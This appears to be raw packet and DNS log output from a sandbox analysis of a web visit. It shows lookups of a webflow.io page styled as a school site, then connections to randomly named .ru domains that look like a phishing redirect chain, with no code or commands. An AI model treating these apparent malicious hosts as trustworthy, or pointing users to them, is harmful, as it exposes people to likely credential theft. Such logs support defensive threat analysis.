                                                  Mar 28, 2025 13:43:07.224572897 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.224580050 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.224852085 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.225758076 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.225773096 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.225868940 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.225868940 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.225874901 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.226589918 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.228212118 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.228228092 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.228425980 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.228431940 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.230057001 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.230077982 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.230279922 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.230298996 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.230444908 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.232193947 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.232213974 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.232281923 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.232289076 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.232327938 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.232482910 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.233844995 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.233859062 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.233917952 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.233931065 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.233954906 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.234632015 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.236226082 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.236244917 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.236320019 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.236320019 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.236326933 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.236552954 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.238008976 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.238024950 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.238115072 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.238115072 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.238121033 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.238337040 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.240467072 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.240513086 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.240556002 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.240561008 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.240585089 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.240752935 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.240771055 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.240832090 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.240832090 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.240838051 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.241010904 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.241024017 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.241158962 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.241166115 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.241353035 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.241370916 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.241403103 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.241408110 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.241673946 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.241689920 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.241709948 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.241770029 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.241770029 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.241776943 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.249695063 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.249710083 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.249850988 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.249877930 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.251533985 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.251578093 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.251614094 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.251624107 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.251660109 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.251663923 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.252607107 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.372637033 CET49753443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.372677088 CET44349753104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.682658911 CET49752443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.724288940 CET44349752104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.785378933 CET44349752104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.785454035 CET44349752104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.785499096 CET49752443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.786746025 CET49752443192.168.2.4104.21.73.212
                                                  Mar 28, 2025 13:43:07.786768913 CET44349752104.21.73.212192.168.2.4
                                                  Mar 28, 2025 13:43:07.879904985 CET49755443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:07.879951000 CET4434975535.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:07.880021095 CET49755443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:07.885282993 CET49755443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:07.885303020 CET4434975535.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.072477102 CET4434975535.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.072546959 CET49755443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:08.074642897 CET49755443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:08.074656010 CET4434975535.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.074906111 CET4434975535.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.075581074 CET49755443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:08.120274067 CET4434975535.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.278542042 CET4434975535.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.278621912 CET4434975535.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.278755903 CET49755443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:08.279051065 CET49755443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:08.279072046 CET4434975535.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.279783964 CET49756443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:08.279819012 CET4434975635.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.279895067 CET49756443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:08.280018091 CET49756443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:08.280030012 CET4434975635.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.464374065 CET4434975635.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.466769934 CET49756443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:08.466801882 CET4434975635.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.466934919 CET49756443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:08.466941118 CET4434975635.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.680186033 CET4434975635.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.680272102 CET4434975635.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.680442095 CET49756443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:08.680545092 CET49756443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:08.680563927 CET4434975635.190.80.1192.168.2.4
                                                  Mar 28, 2025 13:43:08.680573940 CET49756443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:08.680617094 CET49756443192.168.2.435.190.80.1
                                                  Mar 28, 2025 13:43:19.665420055 CET4971580192.168.2.4142.250.65.195
                                                  Mar 28, 2025 13:43:19.754494905 CET8049715142.250.65.195192.168.2.4
                                                  Mar 28, 2025 13:43:19.754576921 CET4971580192.168.2.4142.250.65.195
                                                  Mar 28, 2025 13:43:20.029166937 CET49717443192.168.2.423.57.90.137
                                                  Mar 28, 2025 13:43:20.354840994 CET49759443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:20.354881048 CET44349759104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:20.354960918 CET49759443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:20.355110884 CET49759443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:20.355118990 CET44349759104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:20.553893089 CET44349759104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:20.553972960 CET49759443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:20.555121899 CET49759443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:20.555128098 CET44349759104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:20.555459976 CET44349759104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:20.555758953 CET49759443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:20.596263885 CET44349759104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:21.312572002 CET44349759104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:21.312860012 CET44349759104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:21.312918901 CET49759443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:21.313843012 CET49759443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:21.313869953 CET44349759104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:21.406626940 CET49760443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:21.406681061 CET44349760172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:21.406780958 CET49760443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:21.406929016 CET49760443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:21.406944990 CET44349760172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:21.600233078 CET44349760172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:21.600342989 CET49760443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:21.600971937 CET49760443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:21.601016045 CET44349760172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:21.601236105 CET44349760172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:21.601742983 CET49760443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:21.644277096 CET44349760172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:22.388566017 CET44349760172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:22.388664961 CET44349760172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:22.388772964 CET49760443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:22.390413046 CET49760443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:22.390446901 CET44349760172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:28.734653950 CET49761443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:28.734745026 CET44349761104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:28.734824896 CET49761443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:28.735029936 CET49761443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:28.735049963 CET44349761104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:28.920105934 CET44349761104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:28.920455933 CET49761443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:28.920499086 CET44349761104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:28.920614958 CET49761443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:28.920624971 CET44349761104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:29.656033993 CET44349761104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:29.656147957 CET44349761104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:29.656205893 CET49761443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:29.657133102 CET49761443192.168.2.4104.21.95.206
                                                  Mar 28, 2025 13:43:29.657146931 CET44349761104.21.95.206192.168.2.4
                                                  Mar 28, 2025 13:43:29.661051989 CET49762443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:29.661079884 CET44349762172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:29.661159039 CET49762443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:29.662120104 CET49762443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:29.662127972 CET44349762172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:29.848911047 CET44349762172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:29.849265099 CET49762443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:29.849292994 CET44349762172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:29.849498987 CET49762443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:29.849503994 CET44349762172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:30.612684011 CET44349762172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:30.612814903 CET44349762172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:30.613003016 CET49762443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:30.614135981 CET49762443192.168.2.4172.67.148.100
                                                  Mar 28, 2025 13:43:30.614156008 CET44349762172.67.148.100192.168.2.4
                                                  Mar 28, 2025 13:43:39.481126070 CET49766443192.168.2.4142.251.40.164
                                                  Mar 28, 2025 13:43:39.481172085 CET44349766142.251.40.164192.168.2.4
                                                  Mar 28, 2025 13:43:39.481245041 CET49766443192.168.2.4142.251.40.164
                                                  Mar 28, 2025 13:43:39.481477022 CET49766443192.168.2.4142.251.40.164
                                                  Mar 28, 2025 13:43:39.481492043 CET44349766142.251.40.164192.168.2.4
                                                  Mar 28, 2025 13:43:39.671367884 CET44349766142.251.40.164192.168.2.4
                                                  Mar 28, 2025 13:43:39.671699047 CET49766443192.168.2.4142.251.40.164
                                                  Mar 28, 2025 13:43:39.671722889 CET44349766142.251.40.164192.168.2.4
                                                  Mar 28, 2025 13:43:49.680819988 CET44349766142.251.40.164192.168.2.4
                                                  Mar 28, 2025 13:43:49.680877924 CET44349766142.251.40.164192.168.2.4
                                                  Mar 28, 2025 13:43:49.680952072 CET49766443192.168.2.4142.251.40.164
                                                  Mar 28, 2025 13:43:51.430903912 CET49766443192.168.2.4142.251.40.164
                                                  Mar 28, 2025 13:43:51.430933952 CET44349766142.251.40.164192.168.2.4
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Mar 28, 2025 13:42:35.479579926 CET53530261.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:35.531966925 CET53600951.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:36.196295977 CET53536491.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:39.429490089 CET5384453192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:42:39.429632902 CET6036153192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:42:39.517823935 CET53538441.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:39.517846107 CET53603611.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:40.781105995 CET6184753192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:42:40.782109976 CET5604453192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:42:40.872468948 CET53618471.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:40.872961998 CET53560441.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:41.349251032 CET5904853192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:42:41.349457026 CET6089053192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:42:41.350430965 CET6419753192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:42:41.351087093 CET6372953192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:42:41.437419891 CET53590481.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:41.437526941 CET53608901.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:41.438539982 CET53641971.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:41.439106941 CET53637291.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:42.451193094 CET4921453192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:42:42.451395988 CET5382653192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:42:42.539453983 CET53492141.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:42.539503098 CET53538261.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:42.958375931 CET6279753192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:42:42.958518028 CET5094153192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:42:43.048501968 CET53627971.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:43.048566103 CET53509411.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:42:53.324337006 CET53619081.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:43:06.199234009 CET5337653192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:43:06.200606108 CET5570253192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:43:06.288866997 CET53533761.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:43:06.289957047 CET53557021.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:43:07.788127899 CET5921153192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:43:07.788719893 CET5578853192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:43:07.877299070 CET53592111.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:43:07.877326012 CET53557881.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:43:12.107769012 CET53554691.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:43:14.175992012 CET5351892162.159.36.2192.168.2.4
                                                  Mar 28, 2025 13:43:20.040222883 CET4983953192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:43:20.041078091 CET5824753192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:43:20.246011972 CET53582471.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:43:20.350927114 CET53498391.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:43:21.317178011 CET6051453192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:43:21.317343950 CET5854753192.168.2.41.1.1.1
                                                  Mar 28, 2025 13:43:21.405595064 CET53605141.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:43:21.405998945 CET53585471.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:43:34.808017015 CET53543931.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:43:34.973094940 CET53588601.1.1.1192.168.2.4
                                                  Mar 28, 2025 13:43:43.231062889 CET138138192.168.2.4192.168.2.255
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Mar 28, 2025 13:42:39.429490089 CET192.168.2.41.1.1.10xdea7Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:39.429632902 CET192.168.2.41.1.1.10x4557Standard query (0)www.google.com65IN (0x0001)false
                                                  Mar 28, 2025 13:42:40.781105995 CET192.168.2.41.1.1.10x9cdeStandard query (0)littlestownseniorhighschool.webflow.ioA (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:40.782109976 CET192.168.2.41.1.1.10x7712Standard query (0)littlestownseniorhighschool.webflow.io65IN (0x0001)false
                                                  Mar 28, 2025 13:42:41.349251032 CET192.168.2.41.1.1.10xa2aaStandard query (0)cdn.prod.website-files.comA (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:41.349457026 CET192.168.2.41.1.1.10x8151Standard query (0)cdn.prod.website-files.com65IN (0x0001)false
                                                  Mar 28, 2025 13:42:41.350430965 CET192.168.2.41.1.1.10xee84Standard query (0)d3e54v103j8qbb.cloudfront.netA (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:41.351087093 CET192.168.2.41.1.1.10x3f46Standard query (0)d3e54v103j8qbb.cloudfront.net65IN (0x0001)false
                                                  Mar 28, 2025 13:42:42.451193094 CET192.168.2.41.1.1.10x99c8Standard query (0)d3e54v103j8qbb.cloudfront.netA (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:42.451395988 CET192.168.2.41.1.1.10xd452Standard query (0)d3e54v103j8qbb.cloudfront.net65IN (0x0001)false
                                                  Mar 28, 2025 13:42:42.958375931 CET192.168.2.41.1.1.10xa368Standard query (0)cdn.prod.website-files.comA (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:42.958518028 CET192.168.2.41.1.1.10xad9cStandard query (0)cdn.prod.website-files.com65IN (0x0001)false
                                                  Mar 28, 2025 13:43:06.199234009 CET192.168.2.41.1.1.10x9e6dStandard query (0)fgof.koxicarev.ruA (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:43:06.200606108 CET192.168.2.41.1.1.10xcf1cStandard query (0)fgof.koxicarev.ru65IN (0x0001)false
                                                  Mar 28, 2025 13:43:07.788127899 CET192.168.2.41.1.1.10x8f05Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:43:07.788719893 CET192.168.2.41.1.1.10x302eStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                  Mar 28, 2025 13:43:20.040222883 CET192.168.2.41.1.1.10x1299Standard query (0)i8yr.viugbu.ruA (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:43:20.041078091 CET192.168.2.41.1.1.10x52daStandard query (0)i8yr.viugbu.ru65IN (0x0001)false
                                                  Mar 28, 2025 13:43:21.317178011 CET192.168.2.41.1.1.10x75bStandard query (0)i8yr.viugbu.ruA (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:43:21.317343950 CET192.168.2.41.1.1.10x4db6Standard query (0)i8yr.viugbu.ru65IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Mar 28, 2025 13:42:39.517823935 CET1.1.1.1192.168.2.40xdea7No error (0)www.google.com142.251.40.164A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:39.517846107 CET1.1.1.1192.168.2.40x4557No error (0)www.google.com65IN (0x0001)false
                                                  Mar 28, 2025 13:42:40.872468948 CET1.1.1.1192.168.2.40x9cdeNo error (0)littlestownseniorhighschool.webflow.io104.18.36.248A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:40.872468948 CET1.1.1.1192.168.2.40x9cdeNo error (0)littlestownseniorhighschool.webflow.io172.64.151.8A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:40.872961998 CET1.1.1.1192.168.2.40x7712No error (0)littlestownseniorhighschool.webflow.io65IN (0x0001)false
                                                  Mar 28, 2025 13:42:41.437419891 CET1.1.1.1192.168.2.40xa2aaNo error (0)cdn.prod.website-files.com104.18.160.117A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:41.437419891 CET1.1.1.1192.168.2.40xa2aaNo error (0)cdn.prod.website-files.com104.18.161.117A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:41.437526941 CET1.1.1.1192.168.2.40x8151No error (0)cdn.prod.website-files.com65IN (0x0001)false
                                                  Mar 28, 2025 13:42:41.438539982 CET1.1.1.1192.168.2.40xee84No error (0)d3e54v103j8qbb.cloudfront.net13.33.251.68A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:41.438539982 CET1.1.1.1192.168.2.40xee84No error (0)d3e54v103j8qbb.cloudfront.net13.33.251.140A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:41.438539982 CET1.1.1.1192.168.2.40xee84No error (0)d3e54v103j8qbb.cloudfront.net13.33.251.210A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:41.438539982 CET1.1.1.1192.168.2.40xee84No error (0)d3e54v103j8qbb.cloudfront.net13.33.251.183A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:42.539453983 CET1.1.1.1192.168.2.40x99c8No error (0)d3e54v103j8qbb.cloudfront.net13.33.251.210A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:42.539453983 CET1.1.1.1192.168.2.40x99c8No error (0)d3e54v103j8qbb.cloudfront.net13.33.251.183A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:42.539453983 CET1.1.1.1192.168.2.40x99c8No error (0)d3e54v103j8qbb.cloudfront.net13.33.251.68A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:42.539453983 CET1.1.1.1192.168.2.40x99c8No error (0)d3e54v103j8qbb.cloudfront.net13.33.251.140A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:43.048501968 CET1.1.1.1192.168.2.40xa368No error (0)cdn.prod.website-files.com104.18.161.117A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:43.048501968 CET1.1.1.1192.168.2.40xa368No error (0)cdn.prod.website-files.com104.18.160.117A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:42:43.048566103 CET1.1.1.1192.168.2.40xad9cNo error (0)cdn.prod.website-files.com65IN (0x0001)false
                                                  Mar 28, 2025 13:43:06.288866997 CET1.1.1.1192.168.2.40x9e6dNo error (0)fgof.koxicarev.ru104.21.73.212A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:43:06.288866997 CET1.1.1.1192.168.2.40x9e6dNo error (0)fgof.koxicarev.ru172.67.166.120A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:43:06.289957047 CET1.1.1.1192.168.2.40xcf1cNo error (0)fgof.koxicarev.ru65IN (0x0001)false
                                                  Mar 28, 2025 13:43:07.877299070 CET1.1.1.1192.168.2.40x8f05No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:43:20.246011972 CET1.1.1.1192.168.2.40x52daNo error (0)i8yr.viugbu.ru65IN (0x0001)false
                                                  Mar 28, 2025 13:43:20.350927114 CET1.1.1.1192.168.2.40x1299No error (0)i8yr.viugbu.ru104.21.95.206A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:43:20.350927114 CET1.1.1.1192.168.2.40x1299No error (0)i8yr.viugbu.ru172.67.148.100A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:43:21.405595064 CET1.1.1.1192.168.2.40x75bNo error (0)i8yr.viugbu.ru172.67.148.100A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:43:21.405595064 CET1.1.1.1192.168.2.40x75bNo error (0)i8yr.viugbu.ru104.21.95.206A (IP address)IN (0x0001)false
                                                  Mar 28, 2025 13:43:21.405998945 CET1.1.1.1192.168.2.40x4db6No error (0)i8yr.viugbu.ru65IN (0x0001)false
